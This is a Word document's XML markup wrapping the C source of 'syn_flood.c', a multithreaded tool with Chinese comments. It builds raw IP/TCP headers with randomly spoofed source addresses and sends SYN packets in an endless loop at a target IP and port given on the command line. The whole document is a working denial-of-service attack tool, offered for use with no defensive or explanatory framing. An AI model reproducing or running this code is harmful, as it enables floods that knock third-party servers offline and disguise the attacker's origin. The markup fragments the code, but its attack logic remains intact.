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067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&gt; File Name: syn_flood.c</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    &gt; Author: Jiange</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    &gt; Mail: jiangezh@qq.com </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    &gt; Created Time: 2016年01月01日 星期五 22时32分34秒</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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#include &lt;signal.h&gt;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&lt;netdb.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#include &lt;errno.h&gt;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#include &lt;time.h&gt; </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#include &lt;arpa/inet.h&gt;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最多线程数 */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>#define MAXCHILD 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原始套接字 */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>int sockfd;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程序活动标志 */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>static int alive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dst_ip[20] = { 0 };</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>int dst_port;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ip{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hl;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tos;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total_len;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frag_and_flags;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ttl;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proto;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checksum;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       sourceIP;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       destIP;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struct tcphdr{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sport;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dport;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       seq;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       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lenres;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    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win;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urp;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pseudohdr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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    saddr;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int </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    daddr;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              zero;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              protocol;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CRC16校验 */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>unsigned short inline</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">checksum (unsigned short *buffer, unsigned short size)   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cksum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while(size&gt;1){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cksum += *buffer++;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 -= sizeof(unsigned short);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if(size){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cksum += *(unsigned char *)buffer;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cksum = (cksum &gt;&gt; 16) + (cksum &amp; 0xffff);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cksum += (cksum &gt;&gt; 16);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return((unsigned short )(~cksum));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发送SYN包函数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> * 填写IP头部，TCP头部</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> * TCP伪头部仅用于校验和的计算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init_header(struct ip *ip, struct tcphdr *tcp, struct pseudohdr *pseudoheader)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sizeof(struct ip) + sizeof(struct tcphdr);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IP头部数据初始化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ip-&gt;hl = (4&lt;&lt;4 | sizeof(struct ip)/sizeof(unsigned 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ip-&gt;tos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ip-&gt;total_len = htons(len);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ip-&gt;id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ip-&gt;frag_and_flags = 0x40;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ip-&gt;ttl = 255;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ip-&gt;proto = IPPROTO_TCP;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ip-&gt;checksum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ip-&gt;sourceIP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ip-&gt;destIP = inet_addr(dst_ip);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TCP头部数据初始化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tcp-&gt;sport = htons( rand()%16383 + 49152 );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tcp-&gt;dport = htons(dst_port);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tcp-&gt;seq = htonl( rand()%90000000 + 2345 );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tcp-&gt;ack = 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tcp-&gt;lenres = (sizeof(struct tcphdr)/4&lt;&lt;4|0);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tcp-&gt;flag = 0x02;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tcp-&gt;win = htons (2048);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tcp-&gt;urp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//TCP伪头部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pseudoheader-&gt;zero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pseudoheader-&gt;protocol = IPPROTO_TCP;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pseudoheader-&gt;length = htons(sizeof(struct tcphdr));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pseudoheader-&gt;daddr = inet_addr(dst_ip);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srand((unsigned) time(NULL));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发送SYN包函数</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> * 填写IP头部，TCP头部</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> * TCP伪头部仅用于校验和的计算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send_synflood(struct sockaddr_in *addr)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buf[100], sendbuf[100];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ip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//IP头部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tcphdr tcp;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//TCP头部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pseudohdr pseudoheader;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//TCP伪头部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= sizeof(struct ip) + sizeof(struct tcphdr);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初始化头部信息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init_header(&amp;ip, &amp;tcp, &amp;pseudoheader);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处于活动状态时持续发送SYN包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while(alive)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ip.sourceIP = rand();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//计算IP校验和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bzero(buf, sizeof(buf));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memcpy(buf , &amp;ip, sizeof(struct ip));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ip.checksum = checksum((u_short *) buf, sizeof(struct ip));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pseudoheader.saddr = ip.sourceIP;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//计算TCP校验和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bzero(buf, sizeof(buf));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memcpy(buf , &amp;pseudoheader, sizeof(pseudoheader));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memcpy(buf+sizeof(pseudoheader), &amp;tcp, sizeof(struct tcphdr));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tcp.sum = checksum((u_short *) buf, sizeof(pseudoheader)+sizeof(struct tcphdr));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bzero(sendbuf, sizeof(sendbuf));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memcpy(sendbuf, &amp;ip, sizeof(struct ip));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memcpy(sendbuf+sizeof(struct ip), &amp;tcp, sizeof(struct tcphdr));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sendto(sockfd, sendbuf, len, 0, (struct sockaddr *) addr, sizeof(struct sockaddr))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perror("sendto()");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pthread_exit("fail");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//sleep(1);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信号处理函数,设置退出变量alive */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">void </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sig_int(int signo)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alive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主函数 */</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">int </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>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sockaddr_in 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hostent * host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pthread_t pthread[MAXCHILD];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err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alive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截取信号CTRL+C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signal(SIGINT, sig_int);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参数是否数量正确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if(argc &lt;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printf("usage: syn &lt;IPaddress&gt; &lt;Port&gt;\n");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strncpy( dst_ip, argv[1], 16 );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dst_port = atoi( argv[2]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bzero(&amp;addr, sizeof(addr));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addr.sin_family = AF_INET;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addr.sin_port = htons(dst_port);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if(inet_addr(dst_ip) == INADDR_NONE)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为DNS地址，查询并转换成IP地址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 = gethostbyname(argv[1]);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if(host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perror("gethostbyname()");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addr.sin_addr = *((struct in_addr*)(host-&gt;h_addr));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strncpy( dst_ip, inet_ntoa(addr.sin_addr), 16 );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addr.sin_addr.s_addr = inet_addr(dst_ip);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dst_port &lt; 0 || dst_port &gt; 65535 )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printf("Port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printf("host ip=%s\n", inet_ntoa(addr.sin_addr));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建立原始socket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sockfd = socket (AF_INET, SOCK_RAW, IPPROTO_TCP);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(sockfd &lt; 0)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perror("socket()");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设置IP选项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(setsockopt (sockfd, IPPROTO_IP, IP_HDRINCL, (char *)&amp;on, sizeof (on))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perror("setsockopt()");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将程序的权限修改为普通用户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setuid(getpid());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建立多个线程协同工作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 i&lt;MAXCHILD;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 = pthread_create(&amp;pthread[i], NULL, send_synflood, &amp;addr);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if(err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perror("pthread_create()");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等待线程结束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 i&lt;MAXCHILD;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 = pthread_join(pthread[i],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if(err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perror("pthread_join Error\n");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close(sockfd);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0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2018-03-26T03:25:56Z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